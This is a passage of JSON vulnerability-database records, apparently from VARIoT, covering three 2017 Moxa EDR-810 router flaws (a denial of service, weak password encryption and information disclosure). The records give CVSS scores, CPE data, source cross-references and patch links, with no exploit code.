"db": "CNNVD",
"id": "CNNVD-201709-806"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Exploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4001/tcp to trigger this vulnerability. Moxa EDR-810 Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14439"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013418"
},
{
"db": "CNVD",
"id": "CNVD-2018-11728"
},
{
"db": "VULHUB",
"id": "VHN-105161"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "TALOS",
"id": "TALOS-2017-0487",
"trust": 3.1
},
{
"db": "NVD",
"id": "CVE-2017-14439",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013418",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-806",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-11728",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105161",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11728"
},
{
"db": "VULHUB",
"id": "VHN-105161"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013418"
},
{
"db": "NVD",
"id": "CVE-2017-14439"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-806"
}
]
},
"id": "VAR-201805-0144",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11728"
},
{
"db": "VULHUB",
"id": "VHN-105161"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11728"
}
]
},
"last_update_date": "2023-12-18T14:01:17.566000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "MoxaEDR-810 patch for denial of service vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/132249"
},
{
"title": "Moxa EDR-810 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=190037"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11728"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013418"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-806"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105161"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013418"
},
{
"db": "NVD",
"id": "CVE-2017-14439"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0487"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14439"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14439"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0487"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11728"
},
{
"db": "VULHUB",
"id": "VHN-105161"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013418"
},
{
"db": "NVD",
"id": "CVE-2017-14439"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-806"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11728"
},
{
"db": "VULHUB",
"id": "VHN-105161"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013418"
},
{
"db": "NVD",
"id": "CVE-2017-14439"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-806"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11728"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-105161"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013418"
},
{
"date": "2018-05-14T20:29:01.033000",
"db": "NVD",
"id": "CVE-2017-14439"
},
{
"date": "2017-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-806"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11728"
},
{
"date": "2022-12-08T00:00:00",
"db": "VULHUB",
"id": "VHN-105161"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013418"
},
{
"date": "2022-12-08T03:52:51.637000",
"db": "NVD",
"id": "CVE-2017-14439"
},
{
"date": "2022-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-806"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-806"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 Input validation vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-013418"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-806"
}
],
"trust": 0.6
}
}
VAR-201805-0128
Vulnerability from variot - Updated: 2023-12-18 13:57An exploitable Weak Cryptography for Passwords vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. An attacker could intercept weakly encrypted passwords and could brute force them. Moxa EDR-810 Contains a vulnerability in the use of cryptographic algorithms.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa EDR-810 is an industrial security router with firewall / NAT / VPN and managed layer 2 switches. It is designed for remotely controlling or monitoring Ethernet-based security applications in a network. The vulnerability is caused by the weak encryption password used in the program
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0128",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-07867"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013419"
},
{
"db": "NVD",
"id": "CVE-2017-12129"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1624"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12129"
}
]
},
"cve": "CVE-2017-12129",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 2.9,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.5,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:A/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 2.9,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-12129",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CNVD-2018-07867",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.9,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.5,
"id": "VHN-102620",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:A/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.1,
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.0,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-12129",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-12129",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-12129",
"trust": 1.0,
"value": "LOW"
},
{
"author": "CNVD",
"id": "CNVD-2018-07867",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-1624",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-102620",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-07867"
},
{
"db": "VULHUB",
"id": "VHN-102620"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013419"
},
{
"db": "NVD",
"id": "CVE-2017-12129"
},
{
"db": "NVD",
"id": "CVE-2017-12129"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1624"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An exploitable Weak Cryptography for Passwords vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. An attacker could intercept weakly encrypted passwords and could brute force them. Moxa EDR-810 Contains a vulnerability in the use of cryptographic algorithms.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa EDR-810 is an industrial security router with firewall / NAT / VPN and managed layer 2 switches. It is designed for remotely controlling or monitoring Ethernet-based security applications in a network. The vulnerability is caused by the weak encryption password used in the program",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12129"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013419"
},
{
"db": "CNVD",
"id": "CNVD-2018-07867"
},
{
"db": "VULHUB",
"id": "VHN-102620"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "TALOS",
"id": "TALOS-2017-0481",
"trust": 3.1
},
{
"db": "NVD",
"id": "CVE-2017-12129",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013419",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1624",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-07867",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-97232",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-102620",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-07867"
},
{
"db": "VULHUB",
"id": "VHN-102620"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013419"
},
{
"db": "NVD",
"id": "CVE-2017-12129"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1624"
}
]
},
"id": "VAR-201805-0128",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-07867"
},
{
"db": "VULHUB",
"id": "VHN-102620"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-07867"
}
]
},
"last_update_date": "2023-12-18T13:57:00.754000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "Patch for Moxa EDR-810 Weak Password Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/126117"
},
{
"title": "Moxa EDR-810 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=190028"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-07867"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013419"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1624"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-327",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-102620"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013419"
},
{
"db": "NVD",
"id": "CVE-2017-12129"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0481"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12129"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12129"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0481"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-07867"
},
{
"db": "VULHUB",
"id": "VHN-102620"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013419"
},
{
"db": "NVD",
"id": "CVE-2017-12129"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1624"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-07867"
},
{
"db": "VULHUB",
"id": "VHN-102620"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013419"
},
{
"db": "NVD",
"id": "CVE-2017-12129"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1624"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-04-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-07867"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-102620"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013419"
},
{
"date": "2018-05-14T20:29:00.640000",
"db": "NVD",
"id": "CVE-2017-12129"
},
{
"date": "2017-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1624"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-04-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-07867"
},
{
"date": "2022-12-09T00:00:00",
"db": "VULHUB",
"id": "VHN-102620"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013419"
},
{
"date": "2022-12-09T01:47:13.937000",
"db": "NVD",
"id": "CVE-2017-12129"
},
{
"date": "2022-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1624"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1624"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 Vulnerabilities in the use of cryptographic algorithms",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-013419"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "encryption problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1624"
}
],
"trust": 0.6
}
}
VAR-201805-0127
Vulnerability from variot - Updated: 2023-12-18 13:48An exploitable information disclosure vulnerability exists in the Server Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted TCP packet can cause information disclosure. An attacker can send a crafted TCP packet to trigger this vulnerability. Moxa EDR-810 Contains an information disclosure vulnerability.Information may be obtained. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0127",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11725"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013420"
},
{
"db": "NVD",
"id": "CVE-2017-12128"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1625"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12128"
}
]
},
"cve": "CVE-2017-12128",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
